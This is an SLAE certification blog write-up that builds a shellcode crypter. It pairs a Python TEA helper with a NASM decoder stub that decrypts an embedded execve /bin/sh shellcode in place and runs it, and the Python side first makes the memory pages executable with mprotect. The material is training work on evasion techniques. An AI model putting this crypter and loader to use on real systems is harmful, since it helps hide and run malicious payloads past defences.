SLAE - Assignment #7: Custom Shellcode Crypter

Posted by: voidsec Post Date: April 2, 2020

Assignment #7: Custom Shellcode Crypter

The seventh and last SLAE assignment requires creating a custom shellcode crypter.

Since I had to implement an entire encryption scheme, both in Python as a helper and in assembly as the main decryption routine, I've opted for something simple. I've chosen the Tiny Encryption Algorithm (TEA) because it does not require an IV or large S-box tables (which would add a huge overhead to my shellcode's decoding routine), and because it's tiny and not too complex to re-implement.

As always, all the code is also available on GitHub.

TEA Implementation:

I started by writing my helper Python script, which can be seen below. It's not heavily commented, but it should give you an insight into how my TEA implementation works.

Anyway, there is also this super useful image that acts as a recap of the algorithm.
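
For readers who prefer text, one TEA encryption round can also be written as below. This is a recap in the notation of the reference description, not something taken from my script: v_0 and v_1 are the two 32-bit halves of a block, k_0 to k_3 are the four 32-bit key words, delta is 0x9E3779B9, and every addition is taken modulo 2^32. The round is repeated 32 times, and decryption applies the same steps in reverse order with subtraction.

```latex
\begin{aligned}
\mathit{sum} &\leftarrow \mathit{sum} + \delta \\
v_0 &\leftarrow v_0 + \bigl( ((v_1 \ll 4) + k_0) \oplus (v_1 + \mathit{sum}) \oplus ((v_1 \gg 5) + k_1) \bigr) \\
v_1 &\leftarrow v_1 + \bigl( ((v_0 \ll 4) + k_2) \oplus (v_0 + \mathit{sum}) \oplus ((v_0 \gg 5) + k_3) \bigr)
\end{aligned}
```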

# Paolo Stagno aka [VoidSec](https://voidsec.com)
# SLAE-1511
# Python implementation of the Tiny Encryption Algorithm (TEA)
# https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm
# Tested on both Python 3.6.9 (ubuntu) and 3.8.2 (win 10)

import ctypes
import string
import random
import itertools
import math


def crypt(plaintext, key):
    """
    Encrypts a message using a 16-character key.

    :param plaintext:
        Plaintext message to encrypt.

    :param key:
        The encryption key used to encrypt the plaintext message.

    :return:
        Encrypted message.
    """
    v = _str2vec(plaintext)
    k = _str2vec(key)
    
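    # Encrypt two 32-bit words (one 64-bit TEA block) at a time.
    # The result is returned directly to avoid shadowing the built-in bytearray.
    return b"".join(_vec2str(_crypt(chunk, k)) for chunk in _chunks(v, 2))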


def _str2vec(string, l=4):
    """
    The string is split into chunks of length l and each chunk is packed into one little-endian unsigned integer.
    
    :param string:
        A binary string (bytes or bytearray) to encode.
    :param l:
        An optional length value of chunks.
    :return:
        A vector containing ceil(n / l) elements where n is string's length.
    """
    n = len(string)  # e.g. 24 for the padded shellcode
    # Split the string into chunks of l bytes
    num_chunks = math.ceil(n / l)  # e.g. 6
    chunks = [string[l * i:l * (i + 1)] for i in range(num_chunks)]
    # Pack each chunk into an integer, least significant byte first (fits a c_uint32 when l=4)
    return [sum(byte << 8 * j for j, byte in enumerate(chunk)) for chunk in chunks]


def _vec2str(vector, l=4):
    """
    Each element of the vector is unpacked into l bytes, least significant byte first.
    
    :param vector:
        An even-length vector.
    :param l:
        The number of bytes to produce per element. This should match the value for l used by _str2vec.
        If the value used is smaller, characters will be lost.
    :return:
        The bytes encoded by the vector.
    """
    return bytes((element >> 8 * i) & 0xff for element in vector for i in range(l))


def _crypt(v, k):
    """
    TEA encryption algorithm. Encrypts a length-2 vector using a length-4 vector key.

    :param v:
        A vector representing the information to be encrypted. *Must* have a length of 2.
    :param k:
        A vector representing the encryption key. *Must* have a length of 4.
    :return:
        A length-2 vector representing the encrypted information v.
    """
    y, z = [ctypes.c_uint32(x) for x in v]
    sum = ctypes.c_uint32(0)
    delta = 0x9E3779B9

    # 32 rounds; assigning to a c_uint32 wraps the result to 32 bits
    for _ in range(32):
        sum.value += delta
        y.value += ((z.value << 4) + k[0]) ^ (z.value + sum.value) ^ ((z.value >> 5) + k[1])
        z.value += ((y.value << 4) + k[2]) ^ (y.value + sum.value) ^ ((y.value >> 5) + k[3])

    return [y.value, z.value]


def _chunks(iterable, n):
    """
    Iterates through an iterable in chunks of size n.

    :param iterable:
        Any iterable. Must have a length which is a multiple of n, or the last element will not contain n elements.
    :param n:
        The size of the chunks.
    :return:
        A generator that yields elements in chunks of size n.
    """
    it = iter(iterable)
    while True:
        chunk = tuple(itertools.islice(it, n))
        if not chunk:
            return
        yield chunk

        
def decrypt(ciphertext, key):
    """
    Decrypts a message using a 16-character key.

    :param ciphertext:
        The encrypted message.

    :param key:
        The encryption key used to encrypt the plaintext message.

    :return:
        Decrypted message.
    """
    if not ciphertext:
        # Return bytes, like the non-empty case does
        return b""

    k = _str2vec(key)
    v = _str2vec(ciphertext)
    
    return b"".join(_vec2str(_decrypt(chunk, k)) for chunk in _chunks(v, 2))


def _decrypt(v, k):
    """
    TEA decryption algorithm. Decrypts a length-2 vector using a length-4 vector key.

    :param v:
        A vector representing the information to be decrypted. *Must* have a length of 2.
    :param k:
        A vector representing the encryption key. *Must* have a length of 4.
    :return:
        A length-2 vector representing the original message.
    """
    y, z = [ctypes.c_uint32(x) for x in v]
    # sum starts at delta * 32 modulo 2**32, the value reached at the end of encryption
    sum = ctypes.c_uint32(0xC6EF3720)
    delta = 0x9E3779B9

    # Undo the 32 encryption rounds in reverse order
    for _ in range(32):
        z.value -= ((y.value << 4) + k[2]) ^ (y.value + sum.value) ^ ((y.value >> 5) + k[3])
        y.value -= ((z.value << 4) + k[0]) ^ (z.value + sum.value) ^ ((z.value >> 5) + k[1])
        sum.value -= delta

    return [y.value, z.value]


def key_generator(size=16, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """
    Generate a 16-character pseudo-random key used to encrypt the plaintext message. Charset is a-z, A-Z, 0-9.

    :param size:
        Optional key size. Default for TEA encryption is 16.

    :return:
        An n-size pseudo-random key, as a bytearray.
    """
    key = "".join(random.choice(chars) for _ in range(size)).encode()
    return bytearray(key)


def nasm_gen(string):
    """
    Generate a NASM-formatted byte list.

    :param string:
        Hex encoded string.

    :return:
        NASM-formatted string, e.g. "0x31, 0xc0".
    """
    # Emit one "0x.." token for every pair of hex digits
    return ", ".join("0x" + string[i:i + 2] for i in range(0, len(string) - 1, 2))


if __name__ == "__main__":
    key=key_generator()
    print("key: {}".format(key))
    hex_key=key.hex()
    print("hex key: {}".format(hex_key))
    print("NASM ready key: {}".format(nasm_gen(hex_key)))
    print("-------------------------------")
    shellcode=bytearray(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80")
    print("shellcode: {}".format(shellcode))
    shellcode_len=len(shellcode)
    print("original shellcode length: {}".format(shellcode_len))
    # TEA works on 8-byte blocks (two 32-bit words), so pad with NOPs (0x90) up to a multiple of 8
    padding = -shellcode_len % 8
    if padding:
        print("[!] shellcode length is not a multiple of 8, it will be padded with {} NOP(s)".format(padding))
        shellcode.extend(b"\x90" * padding)
    hex_shellcode=shellcode.hex()
    print("hex shellcode: {}".format(hex_shellcode))
    shellcode_len=int(len(hex_shellcode)/2)
    print("new shellcode length: {}".format(shellcode_len))
    print("-------------------------------")
    print("Encrypted shellcode:")
    enc = crypt(shellcode, key)
    print(enc)
    hex_enc=enc.hex()
    print("crypted shellcode in hex: {}".format(hex_enc))
    print("NASM ready shellcode: {}".format(nasm_gen(hex_enc)))
    print("-------------------------------")
    print("Decrypted shellcode:")
    dec=decrypt(enc, key)
    print(dec)
    print("decrypted shellcode in hex: {}".format(dec.hex()))
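    print("Executing the shellcode...")
    # Linux only: libc.so.6 is loaded in order to call mprotect
    shellcode=ctypes.create_string_buffer(dec)
    function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
    addr = ctypes.cast(function, ctypes.c_void_p).value
    libc = ctypes.CDLL('libc.so.6')
    # Declare the prototype so the page address is passed as a pointer and not as a C int
    libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    pagesize = libc.getpagesize()
    addr_page = (addr // pagesize) * pagesize
    for page_start in range(addr_page, addr+len(dec), pagesize):
        # The NX bit prevents our data from being executed; to get around it, we mark the pages RWX (0x7) with mprotect
        if libc.mprotect(page_start, pagesize, 0x7) != 0:
            raise OSError("mprotect failed")
    function()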
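
As a cross-check of the script above, here is a minimal, self-contained sketch of the same round structure using plain integers and a 32-bit mask instead of ctypes. It also shows where the decryption starting value 0xC6EF3720 comes from: it is delta multiplied by the 32 rounds, modulo 2^32. The names `tea_encrypt_block`, `tea_decrypt_block`, `MASK` and the example key are illustrative assumptions and not part of my helper script.

```python
MASK = 0xFFFFFFFF      # keep every result inside 32 bits
DELTA = 0x9E3779B9     # TEA constant
ROUNDS = 32


def tea_encrypt_block(v0, v1, k):
    """Encrypt one 64-bit block given as two 32-bit words (hypothetical helper)."""
    total = 0
    for _ in range(ROUNDS):
        total = (total + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + total) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + total) ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, k):
    """Undo tea_encrypt_block by running the rounds in reverse (hypothetical helper)."""
    total = (DELTA * ROUNDS) & MASK  # same value as the hard-coded 0xC6EF3720
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + total) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + total) ^ ((v1 >> 5) + k[1]))) & MASK
        total = (total - DELTA) & MASK
    return v0, v1


# Arbitrary example key, chosen only for this sketch
key = (0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210)
# First 8 bytes of the execve shellcode, read as two little-endian 32-bit words
block = (0x6850C031, 0x68732F2F)

cipher = tea_encrypt_block(block[0], block[1], key)
plain = tea_decrypt_block(cipher[0], cipher[1], key)
print("round trip ok:", plain == block)
```

Masking after every addition or subtraction plays the role that `c_uint32` plays in the script: only the low 32 bits of each intermediate value matter.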

And here is my ASM implementation of the decryption routine:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; NASM Implementation of the Tiny Encryption Algorithm (TEA)
; https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm

global _start
; EAX = scratch, holds the round function result
; EBX = scratch, holds v0 or v1 and partial results
; ECX = COUNTER
; EDX = SUM
; ESI = *encrypted_shellcode (current 8-byte block: v0 at ESI, v1 at ESI+4)
; EDI = *key
section .text
_start:
  xor ecx, ecx                      ; clear ECX
  mul ecx                           ; trick to clear EAX and EDX
  xor ebx, ebx                      ; clear EBX
  xor esi, esi                      ; clear ESI
  xor edi, edi                      ; clear EDI
  jmp short key_section             ; goto key_section

key_section:
  ; key words as loaded from memory (each DWORD is read little-endian)
  ; key0: 0x375a646c
  ; key1: 0x6756776e
  ; key2: 0x41364357
  ; key3: 0x51716c4e
  call key_loader                   ; goto key_loader, pushing the address of key on the stack
  ;       |          0          |            1           |           2          |            3           |
  ;       |         EDI         |          EDI+4         |         EDI+8        |          EDI+12        |
  key: db 0x6c, 0x64, 0x5a, 0x37, 0x6e, 0x77, 0x56, 0x67, 0x57, 0x43, 0x36, 0x41, 0x4e, 0x6c, 0x71, 0x51

key_loader:
  pop edi                           ; load address of our key into EDI (JMP CALL POP trick)
  jmp short shellcode_section       ; goto shellcode_section

decoder:
  pop esi                           ; load address of our encrypted_shellcode into ESI (JMP CALL POP trick)
  mov cl, 3                         ; number of 8-byte blocks to decrypt (shellcode length is 24, 24/8=3)
  ; the shellcode is decrypted in place, so the memory it lives in must be writable and executable

decrypt_loop:
  push ecx                          ; save block counter before entering the 32-round loop
  mov ecx, 32                       ; round counter, we need to cycle 32 times
  mov edx, 0xC6EF3720               ; EDX = sum, starts at delta*32
  loop_32:
    ; v1 = v1 - (((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3))
    mov ebx, dword [esi]            ; EBX = v0
    mov eax, ebx                    ; v0 is now in EAX
    shl eax, 4                      ; v0<<4
    add eax, dword [edi+8]          ; +k2
    push eax                        ; store (v0<<4) + k2 on stack
    mov eax, ebx                    ; v0 is now in EAX
    add eax, edx                    ; v0 + sum
    push eax                        ; store v0 + sum on stack
    mov eax, ebx                    ; v0 is now in EAX
    shr eax, 5                      ; v0>>5
    add eax, dword [edi+12]         ; +k3
    pop ebx                         ; restore EBX = (v0 + sum)
    xor eax, ebx                    ; EAX = (v0 + sum) ^ ((v0>>5) + k3)
    pop ebx                         ; restore EBX = ((v0<<4) + k2)
    xor eax, ebx                    ; EAX = ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3)
    sub dword [esi+4], eax          ; v1 = v1 - EAX, written back in place
    ;--------------------------------------------------------------------------------------
    ; v0 = v0 - (((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1))
    mov ebx, dword [esi+4]          ; EBX = v1 (the value just updated above)
    mov eax, ebx                    ; v1 is now in EAX
    shl eax, 4                      ; v1<<4
    add eax, dword [edi]            ; +k0
    push eax                        ; store (v1<<4) + k0 on stack
    mov eax, ebx                    ; v1 is now in EAX
    add eax, edx                    ; v1 + sum
    push eax                        ; store v1 + sum on stack
    mov eax, ebx                    ; v1 is now in EAX
    shr eax, 5                      ; v1>>5
    add eax, dword [edi+4]          ; +k1
    pop ebx                         ; restore EBX = (v1 + sum)
    xor eax, ebx                    ; EAX = (v1 + sum) ^ ((v1>>5) + k1)
    pop ebx                         ; restore EBX = ((v1<<4) + k0)
    xor eax, ebx                    ; EAX = ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1)
    sub dword [esi], eax            ; v0 = v0 - EAX, written back in place
    sub edx, 0x9E3779B9             ; sum = sum-delta
    loop loop_32                    ; ECX is 0? No, we go back to loop_32 and execute the cycle again
  pop ecx                           ; restore block counter
  add esi, 8                        ; select next chunk "couple"
  loop decrypt_loop                 ; ECX is 0? No, we go back to decrypt_loop and execute the cycle again
  jmp short encrypted_shellcode     ; ECX is 0! We've decrypted our shellcode and we can now directly jump into it

shellcode_section:
        call decoder					; goto decoder, putting encrypted_shellcode on the stack
    ;                       |          A          |           B           |           C           |           D            |          E           |            F          |
    ;						|         ESI         |         ESI+4         |         ESI+8         |         ESI+12         |        ESI+16        |          ESI+20       |
        encrypted_shellcode: db 0x56, 0x0e, 0xfe, 0x51, 0xba, 0x47, 0x31, 0xe3, 0xf6, 0xa5, 0x7b, 0xa8, 0x1a, 0xf8, 0x15, 0x71, 0xa4, 0xf9, 0x5b, 0x91, 0xef, 0x41, 0xdc, 0x3c
    ;						|<-chunk read direction|

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511
